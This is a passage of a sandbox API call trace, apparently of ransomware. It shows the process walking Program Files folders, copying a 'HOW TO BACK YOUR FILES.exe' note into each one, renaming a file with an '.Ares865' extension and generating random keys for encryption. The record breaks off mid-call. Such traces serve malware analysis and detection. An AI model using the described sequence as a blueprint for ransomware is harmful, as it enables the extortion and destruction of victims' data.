[0062.174] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.174] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x568f7aa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x568f7aa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.174] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.174] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.174] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US" [0062.174] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US" [0062.174] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.175] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.178] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.179] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x568f7aa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x568f7aa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.179] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.179] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.179] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.Ares865") returned 81 [0062.179] MoveFileExW (lpExistingFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\gadget.xml"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\gadget.xml.ares865"), dwFlags=0x1) returned 1 [0062.180] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\gadget.xml.Ares865" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\gadget.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0062.181] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1010) returned 1 [0062.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0062.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0062.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0062.181] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0062.182] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0062.182] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.182] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x700, lpName=0x0) returned 0x118 [0062.184] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x700) returned 0x190000 [0062.185] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0062.186] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0062.186] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0062.186] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0062.186] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js" [0062.186] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js" [0062.186] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.186] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\js\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.201] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.201] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\js\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x5691dc00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5691dc00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.201] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.201] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.201] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css" [0062.201] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css" | out: lpString1="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css") returned="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css" [0062.201] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.201] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\en-us\\css\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.205] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.205] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\en-US\\css\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x56943d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56943d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.205] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.205] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.205] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Sidebar\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Sidebar\\en-US") returned="C:\\Program Files\\Windows Sidebar\\en-US" [0062.205] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Sidebar\\en-US" | out: lpString1="C:\\Program Files\\Windows Sidebar\\en-US") returned="C:\\Program Files\\Windows Sidebar\\en-US" [0062.205] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.205] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Sidebar\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows sidebar\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.209] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.209] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x56943d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56943d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.210] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.210] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.210] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Portable Devices", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Portable Devices") returned="C:\\Program Files\\Windows Portable Devices" [0062.210] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Portable Devices" | out: lpString1="C:\\Program Files\\Windows Portable Devices") returned="C:\\Program Files\\Windows Portable Devices" [0062.210] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.210] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Portable Devices\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows portable devices\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.214] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.214] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Portable Devices\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x56969ec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56969ec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.214] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.214] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.214] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Photo Viewer", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Photo Viewer") returned="C:\\Program Files\\Windows Photo Viewer" [0062.214] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Photo Viewer" | out: lpString1="C:\\Program Files\\Windows Photo Viewer") returned="C:\\Program Files\\Windows Photo Viewer" [0062.214] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.214] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Photo Viewer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows photo viewer\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.218] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.218] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Photo Viewer\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x56969ec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56969ec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.218] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.218] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.218] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Photo Viewer\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Photo Viewer\\en-US") returned="C:\\Program Files\\Windows Photo Viewer\\en-US" [0062.218] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Photo Viewer\\en-US" | out: lpString1="C:\\Program Files\\Windows Photo Viewer\\en-US") returned="C:\\Program Files\\Windows Photo Viewer\\en-US" [0062.218] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.219] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Photo Viewer\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows photo viewer\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.222] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.224] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Photo Viewer\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x56969ec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56969ec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0062.224] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.224] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.224] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows NT", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows NT") returned="C:\\Program Files\\Windows NT" [0062.224] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows NT" | out: lpString1="C:\\Program Files\\Windows NT") returned="C:\\Program Files\\Windows NT" [0062.224] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.224] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows NT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows nt\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.258] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.258] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows NT\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x569dc2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x569dc2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.258] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.258] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.258] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows NT\\TableTextService", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows NT\\TableTextService") returned="C:\\Program Files\\Windows NT\\TableTextService" [0062.258] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows NT\\TableTextService" | out: lpString1="C:\\Program Files\\Windows NT\\TableTextService") returned="C:\\Program Files\\Windows NT\\TableTextService" [0062.258] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.259] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows NT\\TableTextService\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows nt\\tabletextservice\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.262] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.263] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x569dc2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x569dc2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.263] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.263] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.263] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows NT\\TableTextService\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows NT\\TableTextService\\en-US") returned="C:\\Program Files\\Windows NT\\TableTextService\\en-US" [0062.263] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows NT\\TableTextService\\en-US" | out: lpString1="C:\\Program Files\\Windows NT\\TableTextService\\en-US") returned="C:\\Program Files\\Windows NT\\TableTextService\\en-US" [0062.263] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.263] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows NT\\TableTextService\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows nt\\tabletextservice\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.267] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.267] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows NT\\TableTextService\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x569dc2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x569dc2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.267] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.267] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.267] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows NT\\Accessories", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows NT\\Accessories") returned="C:\\Program Files\\Windows NT\\Accessories" [0062.267] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows NT\\Accessories" | out: lpString1="C:\\Program Files\\Windows NT\\Accessories") returned="C:\\Program Files\\Windows NT\\Accessories" [0062.267] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.267] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows NT\\Accessories\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows nt\\accessories\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.317] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.317] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows NT\\Accessories\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x56a4e700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56a4e700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.317] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.317] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.317] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows NT\\Accessories\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows NT\\Accessories\\en-US") returned="C:\\Program Files\\Windows NT\\Accessories\\en-US" [0062.317] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows NT\\Accessories\\en-US" | out: lpString1="C:\\Program Files\\Windows NT\\Accessories\\en-US") returned="C:\\Program Files\\Windows NT\\Accessories\\en-US" [0062.317] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.318] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows NT\\Accessories\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows nt\\accessories\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.321] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.321] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows NT\\Accessories\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x56a74860, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x56a74860, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0062.321] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0062.321] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0062.321] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Windows Media Player", iMaxLength=260 | out: lpString1="C:\\Program Files\\Windows Media Player") returned="C:\\Program Files\\Windows Media Player" [0062.321] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Windows Media Player" | out: lpString1="C:\\Program Files\\Windows Media Player") returned="C:\\Program Files\\Windows Media Player" [0062.321] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0062.321] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Windows Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\windows media player\\how to back your files.exe"), bFailIfExists=1) returned 1 [0062.325] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.325] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Media Player\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, 